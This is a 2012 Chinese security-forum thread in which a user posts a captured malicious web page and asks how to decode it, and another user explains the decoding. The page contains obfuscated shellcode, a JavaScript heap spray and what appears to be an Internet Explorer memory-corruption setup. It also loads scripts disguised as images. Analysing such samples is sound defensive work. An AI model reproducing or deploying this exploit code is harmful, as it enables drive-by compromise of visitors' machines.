瑞星卡卡安全论坛

首页 » 技术交流区 » 恶意网站交流 » 求大大帮忙解释下解密方法!谢谢!
jzking121 - 2012-4-3 13:32:00


引用:

<html>
hello worlds
<SCRIPT LANGUAGE="JavaScript">
<!-- Hide
function killErrors() {
return true;
}
window.onerror = killErrors;
// -->
</SCRIPT>


<script src="ie.jpg"></script>
<script src="iee.jpg"></script>
<script src="ieee.jpg"></script>
<script language="JavaScript">
var a=nndx+'M58'+'58'+'M5858'+'M10EBM4B5BM'+'C933MB966M03B8M'+'3480MBD0BMFAE2M05EB'+'MEBE8MFFFFM54FFMBEA3MBDBDMD9E2M8D1CMBDBDM36BDMB1FDMCD36'+'M10A1MD536M36B5MD74AME4ACM0355MBDBFM2DBDM455FM8ED5MBD8FMD5BDMCEE8MCFD8M36E9MB1FBM0355MBDBCM36BDMD755'+'ME4B8M2355MBDBFM5FBDMD544MD3D2MBDBDMC8D5MD1CFME9D0MAB42M7D38MAEC8MD2D5MBDD3MD5BDMCFC8MD0D1M36E9MB1FB'+'M3355MBDBCM36BDMD755ME4BCMD355MBDBFM5FBDMD544M8ED1MBD8FMCED5MD8D5ME9D1MFB36M55B1MBCD2MBDBDM5536MBCD7'+'M55E4MBFF2MBDBDM445FM513CMBCBDMBDBDM6136M7E3CMBD3DMBDBDMBDD7MA7D7MD7EEM42BDME1EBM7D8EM3DFDMBE81MC8BDM7A44MBEB9MCDE1MD893MF97AMB9BEMD8C5MBDBDM748EMECECMEAEEM8EECM367DME5FBM9F55MBDBCM3EBDMBD45M1E54MBDBDM2DBDMBDD7MBDD7'+'MBED7MBDD7MBFD7MBDD5MBDBDMEE7DMFB36M5599MBCBCMBDBDMFB34MD7DDMEDBDMEB42M3495MD9FBMFB36MD7DDMD7BDMD7BD'+'MD7BDMD7B9MEDBDMEB42MD791MD7BDMD7BDMD5BDMBDA2MBDB2M42EDM81EBMFB34M36C5MD9F3MC13DM42B5MC909M3DB1MB5C1'+'MBD42MB8C9MC93DM42B5M5F09M3456M3D3BMBDBDM7ABDMCDFBMBDBDMBDBDMFB7AMBDC9MBDBDMD7BDMD7BDMD7BDM36BDMDDFB'+'M42EDM85EBM3B36MBD3DMBDBDMBDD7MF330MECC9MCB42MEDCDMCB42M42DDM8DEBMCB42M42DDM89EBMCB42M42C5MFDEBM4636'+'M7D8EM668EM513CMBFBDMBDBDM7136M453EMC0E9M34B5MBCA1M7D3EM56B9M364EM3671M3E64MAD7EM7D8EMECEDMEDEEMEDED'+'MEDEDMEAEDMEDEDMEB42M36B5ME9C3MAD55MBDBCM55BDMBDD8MBDBDMDED5MCACBMD5BDMD5CEMD2D9M36E9MB1FBM9955MBDBD'+'M34BDM81FBM1CD9MBDB9MBDBDM1D30M42DDM4242MD8D7MCB42M3681MADFBMB555MBDBDM8EBDMEE66MEEEEM42EEM3D6DM5585'+'M853DMC854M3CACMB8C5M2D2DM2D2DMB5C9M4236M36E8M3051MB8FDM5D42M1B55MBDBDM7EBDM1D55MBDBDM05BDMBCACM3DB9'+'MB17FM55BDMBD2EMBDBDM513CMBCBDMBDBDM4136M7A3EM7AB9M8FBAM2CC9M7AB1MB9FAM34DEMF26CMFA7AM1DB5M2AD8M7A76'+'MB1FAMFDECMC207MFA7AM83ADM0BA0M7A84MA9FAMD405MA669MFA7AM03A5MDBC2M7A1DMA1FAM1441M108AMFA7AM259DMADB7'+'MD945M8D1CMBDBDM36BDMB1FDMCD36M10A1MD536M36B5MD74AME4B9ME955MBDBDM2DBDM455FM8ED5MBD8FMD5BDMCEE8MCFD8'+'M36E9M55BBM42E8M4242M5536MB8D7M55E4MBD88MBDBDM445FM428EM42EAMB9EBMBF56M7EE5M4455M4242ME642MBA7BM3405'+'MBCE2M7ADBMB8FAM5D42MEE7EM6136MD7EEMD5FDMADBDMBDBDM36EAM9DFBMA555M4242ME542MEC7EM36EBM81C8MC936MC593'+'M48BEM36EBM9DCBM48BEM748EMFCF4MBE10M8E78MB266MAD03M6B87MB5C9M767CMBEBAMFD67M4C56MA286'+'M5AC8M36E3M99E3M60BEM36DBMF6B1ME336MBEA1M3660M36B9M78BEME316M7EE4M6055M4241M0F42M5F4F'+'M8449MC05FM673E';
a = a.replace(/M/g,"%u") + jiandao ;


sh = shenzhanshi(a);
sz = sh.length * 2;
zdfeiz = 0x1000000-(sz+0x038);
c = "%20c0c%20c0c";


r = c.replace(re, "u");
zdfei = shenzhanshi(r);


var wfw="0";


while (zdfei.length*2<zdfeiz) zdfei+=zdfei;
szhsen = new Array();
for (i=0;i<8;i++)
{         

  szhsen = zdfei+sh;
}


CollectGarbage();


</script>


<script language="JavaScript">


var asb = new Array();
for(var i = 0; i < 500; i++) {

asb.push(document.createElement("img"));
}







</script>
<body ></body>
</html>


用户系统信息:Mozilla/5.0 (Windows; U; Windows NT 5.1; en) AppleWebKit/535.3 (KHTML, like Gecko) Version/5.0.1 Safari/535.3


附件: 10.jpg
是昔流芳 - 2012-4-3 18:34:00
去掉变量a中的连接符,然后将M替换为%u,在尾部连接变量jiandao的值
jzking121 - 2012-4-3 18:49:00
非常感谢,已经解密出来。jiandao在iee.jpg里面,呵呵:kaka1:
1
查看完整版本: 求大大帮忙解释下解密方法!谢谢!